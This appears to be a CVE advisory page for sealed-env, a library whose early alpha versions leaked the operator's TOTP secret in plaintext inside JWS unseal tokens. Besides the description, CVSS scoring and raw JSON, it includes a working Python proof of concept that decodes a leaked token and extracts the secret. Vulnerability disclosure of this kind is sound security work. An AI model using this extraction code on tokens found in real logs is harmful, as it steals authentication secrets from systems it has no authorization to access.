Security Vulnerability Report
CVE-2026-45091 CVSS 9.1 CRITICAL

Published: 2026-05-12 14:17:09
Last Modified: 2026-05-12 14:17:09

Description

sealed-env is a cross-stack, zero-trust secret management library for Node.js and Java/Spring Boot. In sealed-env enterprise mode, versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embedded the operator's literal TOTP secret in the JWS payload of every minted unseal token. A JWS payload is base64url-encoded JSON; it is signed, NOT encrypted. Any party who could observe a minted token (CI build logs, container env dumps, kubectl describe pod, Sentry/Rollbar stack traces, log aggregators) could decode the payload and extract the TOTP secret in plaintext. This vulnerability is fixed in 0.1.0-alpha.4.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is available; the affected versions are:

sealed-env 0.1.0-alpha.1
sealed-env 0.1.0-alpha.2
sealed-env 0.1.0-alpha.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64
import json

# Simulated leaked JWS token found in logs (Header.Payload.Signature).
# The payload carries the operator's TOTP secret in plaintext.
leaked_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJvcGVyYXRvcl90b3Bfc2VjcmV0IjoiS0VZLTEyMzQ1Njc4OTAiLCJ1c2VyIjoiYWRtaW4ifQ.signature_placeholder"

# Claim names vary between implementations. Try the usual ones first,
# then fall back to any claim whose name contains "secret".
CANDIDATE_KEYS = ("totp_secret", "secret", "key")


def extract_totp_from_token(token):
    try:
        # Split the compact JWS into header, payload, signature
        parts = token.split('.')
        if len(parts) < 2:
            return "Invalid token format"
        payload_b64 = parts[1]
        # base64url omits padding; restore it so the decoder accepts the value
        payload_b64 += '=' * (-len(payload_b64) % 4)
        decoded_str = base64.urlsafe_b64decode(payload_b64).decode('utf-8')
        payload_json = json.loads(decoded_str)
        # No key is needed: the payload is signed, not encrypted
        for key in CANDIDATE_KEYS:
            if key in payload_json:
                return payload_json[key]
        for key, value in payload_json.items():
            if 'secret' in key.lower():
                return value
        return None
    except Exception as e:
        return f"Error: {e}"


print(f"Extracted Secret: {extract_totp_from_token(leaked_token)}")

References

https://github.com/davidalmeidac/sealed-env/security/advisories/GHSA-x3r2-fj3r-g5mv

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45091", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:08.820", "lastModified": "2026-05-12T14:17:08.820", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "sealed-env is a cross-stack, zero-trust secret management library for Node.js and Java/Spring Boot. In sealed-env enterprise mode, versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embedded the operator's literal TOTP secret in the JWS payload of every minted unseal token. JWS payload is base64-encoded JSON, NOT encrypted. Any party who could observe a minted token (CI build logs, container env dumps, kubectl describe pod, Sentry/Rollbar stack traces, log aggregators) could decode the payload and extract the TOTP secret in plaintext. This vulnerability is fixed in 0.1.0-alpha.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://github.com/davidalmeidac/sealed-env/security/advisories/GHSA-x3r2-fj3r-g5mv", "source": "[email protected]"}]}}